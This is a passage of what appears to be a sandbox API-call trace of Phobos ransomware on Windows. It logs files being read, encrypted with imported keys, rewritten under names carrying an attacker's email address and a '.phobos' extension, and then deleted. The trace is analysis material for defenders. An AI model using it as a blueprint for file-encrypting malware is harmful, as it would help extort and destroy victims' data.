cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.603] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.603] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.603] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobecmapfnt10.lst"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0123.604] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=35116) returned 1 [0123.604] CloseHandle (hObject=0x334) returned 1 [0123.604] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobecmapfnt10.lst")) returned 0x2020 [0123.604] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobecmapfnt10.lst.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.604] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobecmapfnt10.lst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0123.604] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b6fc78 | out: lpNewFilePointer=0x0) returned 1 [0123.604] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b6fc78 | out: lpNewFilePointer=0x0) returned 1 [0123.604] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobecmapfnt10.lst.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0123.604] CryptImportKey (in: hProv=0x254d70, pbData=0x3b6fc30, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x3b6fc8c | out: phKey=0x3b6fc8c*=0x29c4e0) returned 1 [0123.604] CryptSetKeyParam (hKey=0x29c4e0, dwParam=0x1, pbData=0x3b6fd38, dwFlags=0x0) returned 1 [0123.604] ReadFile (in: hFile=0x334, lpBuffer=0x4190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x3b6fcb4, lpOverlapped=0x0 | out: lpBuffer=0x4190020*, lpNumberOfBytesRead=0x3b6fcb4*=0x892c, lpOverlapped=0x0) returned 1 [0123.606] CryptEncrypt (in: hKey=0x29c4e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4190020*, pdwDataLen=0x3b6fc50*=0x8930, dwBufLen=0x8930 | out: pbData=0x4190020*, pdwDataLen=0x3b6fc50*=0x8930) returned 1 [0123.606] WriteFile (in: hFile=0x344, lpBuffer=0x4190020*, nNumberOfBytesToWrite=0x8930, lpNumberOfBytesWritten=0x3b6fc98, lpOverlapped=0x0 | out: lpBuffer=0x4190020*, lpNumberOfBytesWritten=0x3b6fc98*=0x8930, lpOverlapped=0x0) returned 1 [0123.608] CryptImportKey (in: hProv=0x254d70, pbData=0x3b6fc24, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x3b6fc90 | out: phKey=0x3b6fc90*=0x29c4a0) returned 1 [0123.608] CryptSetKeyParam (hKey=0x29c4a0, dwParam=0x1, pbData=0x3b6fd38, dwFlags=0x0) returned 1 [0123.608] CryptEncrypt (in: hKey=0x29c4a0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4190020*, pdwDataLen=0x3b6fc50*=0x50, dwBufLen=0x50 | out: pbData=0x4190020*, pdwDataLen=0x3b6fc50*=0x50) returned 1 [0123.608] CryptDestroyKey (hKey=0x29c4a0) returned 1 [0123.608] WriteFile (in: hFile=0x344, lpBuffer=0x4190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x3b6fc98, lpOverlapped=0x0 | out: lpBuffer=0x4190020*, lpNumberOfBytesWritten=0x3b6fc98*=0x102, lpOverlapped=0x0) returned 1 [0123.608] CryptDestroyKey (hKey=0x29c4e0) returned 1 [0123.608] CloseHandle (hObject=0x334) returned 1 [0123.608] CloseHandle (hObject=0x344) returned 1 [0123.609] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobecmapfnt10.lst")) returned 1 [0123.610] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.610] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobesysfnt10.lst"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0123.611] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=138459) returned 1 [0123.611] CloseHandle (hObject=0x344) returned 1 [0123.611] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobesysfnt10.lst")) returned 0x2020 [0123.611] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobesysfnt10.lst.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.611] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobesysfnt10.lst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0123.611] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b6fc78 | out: lpNewFilePointer=0x0) returned 1 [0123.611] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b6fc78 | out: lpNewFilePointer=0x0) returned 1 [0123.611] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobesysfnt10.lst.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0123.612] CryptImportKey (in: hProv=0x254d70, pbData=0x3b6fc30, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x3b6fc8c | out: phKey=0x3b6fc8c*=0x29c4e0) returned 1 [0123.612] CryptSetKeyParam (hKey=0x29c4e0, dwParam=0x1, pbData=0x3b6fd38, dwFlags=0x0) returned 1 [0123.612] ReadFile (in: hFile=0x344, lpBuffer=0x4190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x3b6fcb4, lpOverlapped=0x0 | out: lpBuffer=0x4190020*, lpNumberOfBytesRead=0x3b6fcb4*=0x21cdb, lpOverlapped=0x0) returned 1 [0123.674] CryptEncrypt (in: hKey=0x29c4e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4190020*, pdwDataLen=0x3b6fc50*=0x21ce0, dwBufLen=0x21ce0 | out: pbData=0x4190020*, pdwDataLen=0x3b6fc50*=0x21ce0) returned 1 [0123.676] WriteFile (in: hFile=0x334, lpBuffer=0x4190020*, nNumberOfBytesToWrite=0x21ce0, lpNumberOfBytesWritten=0x3b6fc98, lpOverlapped=0x0 | out: lpBuffer=0x4190020*, lpNumberOfBytesWritten=0x3b6fc98*=0x21ce0, lpOverlapped=0x0) returned 1 [0123.679] CryptImportKey (in: hProv=0x254d70, pbData=0x3b6fc24, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x3b6fc90 | out: phKey=0x3b6fc90*=0x29c4a0) returned 1 [0123.679] CryptSetKeyParam (hKey=0x29c4a0, dwParam=0x1, pbData=0x3b6fd38, dwFlags=0x0) returned 1 [0123.679] CryptEncrypt (in: hKey=0x29c4a0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4190020*, pdwDataLen=0x3b6fc50*=0x50, dwBufLen=0x50 | out: pbData=0x4190020*, pdwDataLen=0x3b6fc50*=0x50) returned 1 [0123.679] CryptDestroyKey (hKey=0x29c4a0) returned 1 [0123.679] WriteFile (in: hFile=0x334, lpBuffer=0x4190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x3b6fc98, lpOverlapped=0x0 | out: lpBuffer=0x4190020*, lpNumberOfBytesWritten=0x3b6fc98*=0x102, lpOverlapped=0x0) returned 1 [0123.680] CryptDestroyKey (hKey=0x29c4e0) returned 1 [0123.680] CloseHandle (hObject=0x344) returned 1 [0123.680] CloseHandle (hObject=0x334) returned 1 [0123.682] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobesysfnt10.lst")) returned 1 [0123.685] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.685] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\acecache11.lst"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0123.685] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=1180) returned 1 [0123.685] CloseHandle (hObject=0x334) returned 1 [0123.685] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\acecache11.lst")) returned 0x2020 [0123.686] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\acecache11.lst.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.686] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\acecache11.lst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0123.686] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b6fc78 | out: lpNewFilePointer=0x0) returned 1 [0123.686] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b6fc78 | out: lpNewFilePointer=0x0) returned 1 [0123.686] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\acecache11.lst.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0123.687] CryptImportKey (in: hProv=0x254d70, pbData=0x3b6fc30, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x3b6fc8c | out: phKey=0x3b6fc8c*=0x29c4e0) returned 1 [0123.687] CryptSetKeyParam (hKey=0x29c4e0, dwParam=0x1, pbData=0x3b6fd38, dwFlags=0x0) returned 1 [0123.687] ReadFile (in: hFile=0x334, lpBuffer=0x4190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x3b6fcb4, lpOverlapped=0x0 | out: lpBuffer=0x4190020*, lpNumberOfBytesRead=0x3b6fcb4*=0x49c, lpOverlapped=0x0) returned 1 [0124.192] CryptEncrypt (in: hKey=0x29c4e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4190020*, pdwDataLen=0x3b6fc50*=0x4a0, dwBufLen=0x4a0 | out: pbData=0x4190020*, pdwDataLen=0x3b6fc50*=0x4a0) returned 1 [0124.192] WriteFile (in: hFile=0x344, lpBuffer=0x4190020*, nNumberOfBytesToWrite=0x4a0, lpNumberOfBytesWritten=0x3b6fc98, lpOverlapped=0x0 | out: lpBuffer=0x4190020*, lpNumberOfBytesWritten=0x3b6fc98*=0x4a0, lpOverlapped=0x0) returned 1 [0124.193] CryptImportKey (in: hProv=0x254d70, pbData=0x3b6fc24, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x3b6fc90 | out: phKey=0x3b6fc90*=0x29c4a0) returned 1 [0124.193] CryptSetKeyParam (hKey=0x29c4a0, dwParam=0x1, pbData=0x3b6fd38, dwFlags=0x0) returned 1 [0124.193] CryptEncrypt (in: hKey=0x29c4a0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4190020*, pdwDataLen=0x3b6fc50*=0x40, dwBufLen=0x40 | out: pbData=0x4190020*, pdwDataLen=0x3b6fc50*=0x40) returned 1 [0124.193] CryptDestroyKey (hKey=0x29c4a0) returned 1 [0124.193] WriteFile (in: hFile=0x344, lpBuffer=0x4190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x3b6fc98, lpOverlapped=0x0 | out: lpBuffer=0x4190020*, lpNumberOfBytesWritten=0x3b6fc98*=0xf2, lpOverlapped=0x0) returned 1 [0124.193] CryptDestroyKey (hKey=0x29c4e0) returned 1 [0124.193] CloseHandle (hObject=0x334) returned 1 [0124.193] CloseHandle (hObject=0x344) returned 1 [0124.195] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\acecache11.lst")) returned 1 [0124.197] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0124.197] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\profiles\\wscrgb.icc"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0124.197] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=66208) returned 1 [0124.197] CloseHandle (hObject=0x344) returned 1 [0124.197] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\profiles\\wscrgb.icc")) returned 0x2020 [0124.197] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\profiles\\wscrgb.icc.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0124.197] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\profiles\\wscrgb.icc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0124.198] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b6fc78 | out: lpNewFilePointer=0x0) returned 1 [0124.198] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b6fc78 | out: lpNewFilePointer=0x0) returned 1 [0124.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\profiles\\wscrgb.icc.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0124.199] CryptImportKey (in: hProv=0x254d70, pbData=0x3b6fc30, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x3b6fc8c | out: phKey=0x3b6fc8c*=0x29c4e0) returned 1 [0124.199] CryptSetKeyParam (hKey=0x29c4e0, dwParam=0x1, pbData=0x3b6fd38, dwFlags=0x0) returned 1 [0124.199] ReadFile (in: hFile=0x344, lpBuffer=0x4190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x3b6fcb4, lpOverlapped=0x0 | out: lpBuffer=0x4190020*, lpNumberOfBytesRead=0x3b6fcb4*=0x102a0, lpOverlapped=0x0) returned 1 [0124.566] CryptEncrypt (in: hKey=0x29c4e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4190020*, pdwDataLen=0x3b6fc50*=0x102b0, dwBufLen=0x102b0 | out: pbData=0x4190020*, pdwDataLen=0x3b6fc50*=0x102b0) returned 1 [0124.567] WriteFile (in: hFile=0x334, lpBuffer=0x4190020*, nNumberOfBytesToWrite=0x102b0, lpNumberOfBytesWritten=0x3b6fc98, lpOverlapped=0x0 | out: lpBuffer=0x4190020*, lpNumberOfBytesWritten=0x3b6fc98*=0x102b0, lpOverlapped=0x0) returned 1 [0124.569] CryptImportKey (in: hProv=0x254d70, pbData=0x3b6fc24, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x3b6fc90 | out: phKey=0x3b6fc90*=0x29c620) returned 1 [0124.569] CryptSetKeyParam (hKey=0x29c620, dwParam=0x1, pbData=0x3b6fd38, dwFlags=0x0) returned 1 [0124.569] CryptEncrypt (in: hKey=0x29c620, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4190020*, pdwDataLen=0x3b6fc50*=0x40, dwBufLen=0x40 | out: pbData=0x4190020*, pdwDataLen=0x3b6fc50*=0x40) returned 1 [0124.569] CryptDestroyKey (hKey=0x29c620) returned 1 [0124.569] WriteFile (in: hFile=0x334, lpBuffer=0x4190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x3b6fc98, lpOverlapped=0x0 | out: lpBuffer=0x4190020*, lpNumberOfBytesWritten=0x3b6fc98*=0xf2, lpOverlapped=0x0) returned 1 [0124.569] CryptDestroyKey (hKey=0x29c4e0) returned 1 [0124.569] CloseHandle (hObject=0x344) returned 1 [0124.569] CloseHandle (hObject=0x334) returned 1 [0124.570] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\profiles\\wscrgb.icc")) returned 1 [0124.572] SetEvent (hEvent=0x268) returned 1 [0124.572] SetEvent (hEvent=0x264) returned 1 [0124.572] SetEvent (hEvent=0x26c) returned 1 [0124.572] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x50) returned 0x1db1470 [0124.572] CryptImportKey (in: hProv=0x254d70, pbData=0x3b6fc80, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x3b6fce8 | out: phKey=0x3b6fce8*=0x29c4e0) returned 1 [0124.572] CryptSetKeyParam (hKey=0x29c4e0, dwParam=0x1, pbData=0x3b6fcd0, dwFlags=0x0) returned 1 [0124.572] CryptDecrypt (in: hKey=0x29c4e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db1470, pdwDataLen=0x3b6fc9c | out: pbData=0x1db1470, pdwDataLen=0x3b6fc9c) returned 1 [0124.572] CryptDestroyKey (hKey=0x29c4e0) returned 1 [0124.572] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76180000 [0124.573] GetProcAddress (hModule=0x76180000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x761ad668 [0124.573] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0124.573] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db1470 | out: hHeap=0x1db0000) returned 1 [0124.573] SetEvent (hEvent=0x268) returned 1 [0124.573] SetEvent (hEvent=0x264) returned 1 [0124.573] SetEvent (hEvent=0x26c) returned 1 [0124.573] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4190020 | out: hHeap=0x1db0000) returned 1 [0124.595] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db58d0 | out: hHeap=0x1db0000) returned 1 [0124.595] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30abf18 | out: hHeap=0x1db0000) returned 1 [0124.595] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30cbf28 | out: hHeap=0x1db0000) returned 1 Thread: id = 104 os_tid = 0x7ac [0112.493] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x30dbf30 [0112.493] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x3fb0058 [0112.494] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x28) returned 0x1db5900 [0112.494] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x110102) returned 0x42b0020 [0112.494] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x50) returned 0x1db9a90 [0112.494] CryptImportKey (in: hProv=0x254d70, pbData=0x3c6fcf8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x3c6fd60 | out: phKey=0x3c6fd60*=0x29c1a0) returned 1 [0112.494] CryptSetKeyParam (hKey=0x29c1a0, dwParam=0x1, pbData=0x3c6fd48, dwFlags=0x0) returned 1 [0112.494] CryptDecrypt (in: hKey=0x29c1a0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9a90, pdwDataLen=0x3c6fd14 | out: pbData=0x1db9a90, pdwDataLen=0x3c6fd14) returned 1 [0112.494] CryptDestroyKey (hKey=0x29c1a0) returned 1 [0112.494] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76180000 [0112.495] GetProcAddress (hModule=0x76180000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x761ad650 [0112.495] Wow64DisableWow64FsRedirection (in: OldValue=0x3c6fdac | out: OldValue=0x3c6fdac*=0x0) returned 1 [0112.495] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9a90 | out: hHeap=0x1db0000) returned 1 [0112.495] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0112.495] CreateFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.495] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=129) returned 1 [0112.495] CloseHandle (hObject=0x2a0) returned 1 [0112.495] GetFileAttributesW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini")) returned 0x26 [0112.495] GetFileAttributesW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0x20 [0112.496] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0112.497] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.497] CryptGenRandom (in: 